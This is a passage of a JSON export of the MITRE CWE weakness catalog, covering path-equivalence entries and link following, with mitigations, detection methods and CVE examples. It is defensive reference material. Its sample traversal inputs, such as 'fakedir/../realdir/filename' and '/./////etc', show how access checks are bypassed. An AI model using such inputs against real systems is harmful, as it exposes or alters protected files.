slash","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/multiple/trailing/slash// (\'multiple trailing slash\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Trailing Slash - /multiple/trailing/slash//","attr":{"@_Date":"2008-04-11"}}}},"53":{"attr":{"@_ID":"53","@_Name":"Path Equivalence: \'\\\\multiple\\\\\\\\internal\\\\backslash\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of multiple internal backslash (\'\\\\multiple\\\\trailing\\\\\\\\slash\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"165","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\\\\multiple\\\\\\\\internal\\\\backslash"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Internal Backslash - \\\\multiple\\\\\\\\internal\\\\backslash","attr":{"@_Date":"2008-04-11"}}}},"54":{"attr":{"@_ID":"54","@_Name":"Path Equivalence: \'filedir\\\\\' (Trailing Backslash)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of trailing backslash (\'filedir\\\\\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"162","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-0847","Description":"ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) \\"\\\\\\" (backslash) or (2) \\"%5C\\" (encoded backslash), aka \\"Path Validation Vulnerability.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir\\\\ (trailing backslash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Trailing Backslash - (filedir\\\\)","attr":{"@_Date":"2008-04-11"}}}},"55":{"attr":{"@_ID":"55","@_Name":"Path Equivalence: \'/./\' (Single Dot Directory)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of single dot directory exploit (\'/./\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0004","Description":"Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0004"},{"Reference":"CVE-2002-0304","Description":"Server allows remote attackers to read password-protected files via a /./ in the HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0304"},{"Reference":"BID:6042","Description":"Input Validation error","Link":"http://www.securityfocus.com/bid/6042"},{"Reference":"CVE-1999-1083","Description":"Possibly (could be a cleansing error)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1083"},{"Reference":"CVE-2004-0815","Description":"\\"/./////etc\\" cleansed to \\".///etc\\" then \\"/etc\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2002-0112","Description":"Server allows remote attackers to view password protected files via /./ in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0112"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"/./ (single dot directory)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Single Dot Directory - /./","attr":{"@_Date":"2008-04-11"}}}},"56":{"attr":{"@_ID":"56","@_Name":"Path Equivalence: \'filedir*\' (Wildcard)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A software system that accepts path input in the form of asterisk wildcard (\'filedir*\') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"155","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0696","Description":"List directories using desired path and \\"*\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0696"},{"Reference":"CVE-2002-0433","Description":"List files in web server using \\"*.ext\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"filedir* (asterisk / wildcard)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Asterisk Wildcard - filedir*","attr":{"@_Date":"2008-04-11"}}}},"57":{"attr":{"@_ID":"57","@_Name":"Path Equivalence: \'fakedir/../realdir/filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains protection mechanisms to restrict access to \'realdir/filename\', but it constructs pathnames using external input in the form of \'fakedir/../realdir/filename\' that are not handled by those mechanisms. This allows attackers to perform unauthorized actions against the targeted file.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1152","Description":"Proxy allows remote attackers to bypass denylist restrictions and connect to unauthorized web servers by modifying the requested URL, including (1) a // (double slash), (2) a /SUBDIR/.. where the desired file is in the parentdir, (3) a /./, or (4) URL-encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1152"},{"Reference":"CVE-2000-0191","Description":"application check access for restricted URL before canonicalization","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2005-1366","Description":"CGI source disclosure using \\"dirname/../cgi-bin\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1366"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"dirname/fakechild/../realchild/filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This is a manipulation that uses an injection for one consequence (containment violation using relative path) to achieve a different consequence (equivalence by alternate name).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Observed_Examples, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - dirname/fakechild/../realchild/filename","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Equivalence: \'dirname/fakechild/../realchild/filename\'","attr":{"@_Date":"2008-10-14"}}]}},"58":{"attr":{"@_ID":"58","@_Name":"Path Equivalence: Windows 8.3 Filename","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a protection mechanism that restricts access to a long filename on a Windows operating system, but the software does not properly restrict access to the equivalent short \\"8.3\\" filename.","Extended_Description":"On later Windows operating systems, a file can have a \\"long name\\" and a short name that is compatible with older Windows file systems, with up to 8 characters in the filename and 3 characters for the extension. These \\"8.3\\" filenames, therefore, act as an alternate name for files with long names, so they are useful pathname equivalence manipulations.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"41","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"Windows","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Disable Windows from supporting 8.3 filenames by editing the Windows registry. Preventing 8.3 filenames will not remove previously generated 8.3 filenames."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0012","Description":"Multiple web servers allow restriction bypass using 8.3 names instead of long names","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0012"},{"Reference":"CVE-2001-0795","Description":"Source code disclosure using 8.3 file name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0795"},{"Reference":"CVE-2005-0471","Description":"Multi-Factor Vulnerability. Product generates temporary filenames using long filenames, which become predictable in 8.3 format.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0471"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Windows 8.3 Filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, &#34;DOS 8.3 Filenames&#34;, Page 673"}}]},"Notes":{"Note":{"#text":"Probably under-studied","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Issue - Windows 8.3 Filename","attr":{"@_Date":"2008-04-11"}}}},"59":{"attr":{"@_ID":"59","@_Name":"Improper Link Resolution Before File Access (\'Link Following\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":[{"attr":{"@_Class":"Windows","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Unix","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Soft links are a UNIX term that is synonymous with simple shortcuts on windows based platforms."},"Alternate_Terms":{"Alternate_Term":{"Term":"insecure temporary file","Description":"Some people use the phrase \\"insecure temporary file\\" when referring to a link following weakness, but other weaknesses can produce insecure temporary files without any symlink involvement at all."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"],"Note":"An attacker may be able to traverse the file system to unintended locations and read or overwrite the contents of unexpected files. If the files are used for a security mechanism then an attacker may be able to bypass the mechanism."},{"Scope":"Other","Impact":"Execute Unauthorized Code or Commands","Note":"Windows simple shortcuts, sometimes referred to as soft links, can be exploited remotely since a \\".LNK\\" file can be uploaded like a normal file. This can enable remote execution."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-48.1"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Follow the principle of least privilege when assigning access rights to entities in a software system.","Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1386","Description":"Some versions of Perl follows symbolic links when running with the -e option, which allows local users to overwrite arbitrary files via a symlink attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1386"},{"Reference":"CVE-2000-1178","Description":"Text editor follows symbolic links when creating a rescue copy during an abnormal exit, which allows local users to overwrite the files of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1178"},{"Reference":"CVE-2004-0217","Description":"Antivirus update allows local users to create or append to arbitrary files via a symlink attack on a logfile.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0217"},{"Reference":"CVE-2003-0517","Description":"Symlink attack allows local users to overwrite 